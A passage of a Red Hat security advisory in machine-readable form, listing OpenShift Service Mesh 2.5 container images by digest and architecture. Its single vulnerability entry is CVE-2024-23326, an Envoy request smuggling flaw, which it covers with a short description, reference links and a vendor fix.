name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product_id: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", product_identification_helper: { purl: "pkg:oci/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/proxyv2-rhel8&tag=2.5.5-6", }, }, }, { category: "product_version", name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product_id: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", product_identification_helper: { purl: "pkg:oci/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b?arch=arm64&repository_url=registry.redhat.io/openshift-service-mesh/ratelimit-rhel8&tag=2.5.5-3", }, }, }, ], category: "architecture", name: "arm64", }, ], category: "vendor", name: "Red Hat", }, ], relationships: [ { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", }, product_reference: "openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", }, product_reference: "openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", }, product_reference: "openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", }, product_reference: "openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", }, product_reference: "openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", }, product_reference: "openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", }, product_reference: "openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", relates_to_product_reference: "8Base-RHOSSM-2.5", }, { category: "default_component_of", full_product_name: { name: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64 as a component of RHOSSM 2.5 for RHEL 8", product_id: "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", }, product_reference: "openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", relates_to_product_reference: "8Base-RHOSSM-2.5", }, ], }, vulnerabilities: [ { cve: "CVE-2024-23326", cwe: { id: "CWE-444", name: "Inconsistent Interpretation of HTTP Requests ('HTTP Request/Response Smuggling')", }, discovery_date: "2024-01-19T00:00:00+00:00", ids: [ { system_name: "Red Hat Bugzilla ID", text: "2259228", }, ], notes: [ { category: "description", text: "A possible request smuggling vulnerability exists through Envoy. This issue occurs if a server can be tricked into adding an upgrade header into a response.", title: "Vulnerability description", }, { category: "summary", text: "envoy: Envoy incorrectly accepts HTTP 200 response for entering upgrade mode", title: "Vulnerability summary", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:58dc105a4b89b8eed3892f577595577f3972431e81636609218bd87d300ec662_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:aee0aa13cd55c4dbebde559f90123c575a222bff48cef4a29d57efcca3ec3831_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:0e4a75f9a16266a79814f42f1ac475fe426b6720c52daa98df594a979a1e727d_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:597475e28f081bd14755ca909fceb2dd1c01c6a3d1b7e1b6f89739c1206c7f9b_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:913b90b39c5f78b328c202630f43f41daa8ba1e132411679a1dc655f3992b265_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-must-gather-rhel8@sha256:a14488ddf9859b13676abb82bbc9925e3b65baedbeff46657c4754c9486e14d9_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:013dda8dba6f8aab89e4a10e4289362751dd14d01704604199ba36c29316c10c_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:b17bed92b891131e3bed248ff4fa8329e6802cbcc6b07aac240cf8f95e6fa48b_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:ce420c9b076a15d91c9e62000d4129911d54db27a4c91913e384eb284557edae_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-ossmc-rhel8@sha256:dea5fd5d8ce03c54d40301ca4dd2ba23a9f61f9edbfa8565ff0ccb369b811e55_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:31242f9c6c8bf429d4b11ca458b83a2931c95e6032676b76948e84acfd1f4ace_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:4f1bf796330b85789da7622a41da8dfba144121864936f5a978a789f31471805_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:9c52215736668ee145e505fafb22e1feec36cb526168a9268d3bb2e3d236a2b8_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/kiali-rhel8@sha256:d8ba5cb7d2e2ecfbf226ee7b880c750a8006b3648f4bd9eace3b3bfa60aa98a2_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:5ceb0e239b8fb78edbb3f18ad522bbde2dc949b0847200c9a8a601631dc00301_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:c20112f355c939e97a44229056277da2ce68511ed65bd19868707efd89444dbb_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:cea91c8c067cdfd4a321895eaef62fa914a65a204e687e59cb9d8f3f03cbd2cd_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/pilot-rhel8@sha256:eebb1aef0d32db79f88ea74caeefbd13aa00a2cd39726f7b9996f0a381fdd5fa_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:203fa7f4d917e0bad625691aaa9a060a902995d4a905c04514d907fd11858e79_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:95f289d7a5fb1c6e6dc1eb424605bbcab484ea39222bdb4f86bf8932fdaa0bd2_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c922a8a50ed805f36822a1e5906c31c41123070f589177a7e95934c94c29befc_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/proxyv2-rhel8@sha256:c93cc0a574fe8d4c8af5fae3955497a09aa718494cae342da881ed43aafad35a_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:39271db703a21bf1dd5013d21b991119a7c576c3e9b9d057bdae3d38d84c8679_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:566e4e1b3973d75f13f6efeea02bacc6f687b3ec72a09ca94bab6f37a73a4c60_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:98e2b3ad04539728d36ace3eae0816582a930388a6a5903a9175110aa1ee1e83_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/ratelimit-rhel8@sha256:b1825622263dd1065be939d18d163bc8ba1b0c53158bc7805cc36507c44f830b_arm64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-23326", }, { category: "external", summary: "RHBZ#2259228", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2259228", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-23326", url: "https://www.cve.org/CVERecord?id=CVE-2024-23326", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-23326", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-23326", }, { category: "external", summary: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c", url: "https://github.com/envoyproxy/envoy/security/advisories/GHSA-vcf8-7238-v74c", }, ], release_date: "2024-06-04T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-07T09:24:53+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:807b8705bdd289e7c538dad646cdb00619b60a547faabfc4462beb3669c9593b_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:c03cbaf1d6e8abd5f43bfa059359bd3da0e5ae0a5b4434f3d56eedceb238761c_ppc64le", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:f18469f64f1c87b3e9186db6a955f0063197d45781a570a31102ae0d23fff5b8_arm64", "8Base-RHOSSM-2.5:openshift-service-mesh/grafana-rhel8@sha256:fdbac779cb1568b0eb9bc7a8f194a446583b08fa68f7d5f1dcd3ba31d4e2c14f_amd64", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:2784045844231bcd2212f84d0ae05aace9b8e0fe31ce5c3a49c1e865d9b6f7b4_s390x", "8Base-RHOSSM-2.5:openshift-service-mesh/istio-cni-rhel8@sha256:40c8bfb02b7078d04f115fcd4894cc4f4b452f1e192afac3fe2db2f9249eca42_amd64", 